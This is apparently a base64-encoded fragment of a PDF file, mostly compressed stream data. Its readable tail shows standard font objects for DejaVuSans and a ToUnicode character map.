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zUgMjk1IDYzNiA2MzYgMzM3IDYzNiA2MzQgNDExIDYzNCA5NzQgMzYxIDU5MiA2MDMgNjM2IDMzNyAyNzggMzE4IDYzNSA2ODUgNTAwIDU5MiA2ODQgNTkyIDMzNyA3NzAgNzQ4IDYzNiAyOTUgMzkwIDM5MCA1NzkgXQpdCj4+CmVuZG9iagoyOSAwIG9iago8PCAvTGVuZ3RoIDcxNCA+PgpzdHJlYW0KL0NJREluaXQgL1Byb2NTZXQgZmluZHJlc291cmNlIGJlZ2luCjEyIGRpY3QgYmVnaW4KYmVnaW5jbWFwCi9DSURTeXN0ZW1JbmZvIDw8IC9SZWdpc3RyeSAoQWRvYmUpIC9PcmRlcmluZyAoVUNTKSAvU3VwcGxlbWVudCAwID4+IGRlZgovQ01hcE5hbWUgL0Fkb2JlLUlkZW50aXR5LVVDUyBkZWYKL0NNYXBUeXBlIDIgZGVmCjEgYmVnaW5jb2Rlc3BhY2VyYW5nZQo8MDAwMD4gPEZGRkY+CmVuZGNvZGVzcGFjZXJhbmdlCjIgYmVnaW5iZnJhbmdlCjwwMDAwPiA8MDAwMD4gPDAwMDA+CjwwMDAxPiA8MDAzMj4gWzwwMDUyPiA8MDA2NT4gPDAwNzM+IDwwMDcwPiA8MDA2Rj4gPDAwNkU+IDwwMDA5PiA8MDA1Mz4gPDAwNjM+IDwwMDYxPiA8MDA2OT4gPDAwNjc+IDwwMDQ1PiA8MDAzNz4gPDAwMkU+IDwwMDM4PiA8MDAzMD4gPDAwNzc+IDwwMDc0PiA8MDA2ND4gPDAwNEE+IDwwMDMyPiA8MDAzMT4gPDAwM0E+IDwwMDMzPiA8MDA2OD4gPDAwNzI+IDwwMDc1PiA8MDA2RD4gPDAwMkQ+IDwwMDc2PiA8MDA1MD4gPDAwMzQ+IDwwMDJGPiA8MDA2Qz4gPDAwMkM+IDwwMDYyPiA8MDA1OD4gPDAwNUY+IDwwMDc4PiA8MDA1Nj4gPDAwNzk+IDwwMDNCPiA8MDA0ND4gPDAwNEU+IDwwMDM1PiA8MDA0OT4gPDAwMjg+IDwwMDI5PiA8MDA2Qj4gXQplbmRiZnJhbmdlCmVuZGNtYXAKQ01hcE5hbWUgY3VycmVudGRpY3QgL0NNYXAgZGVmaW5lcmVzb3VyY2UgcG9wCmVuZAplbmQKCmVuZHN0cmVhbQplbmRvY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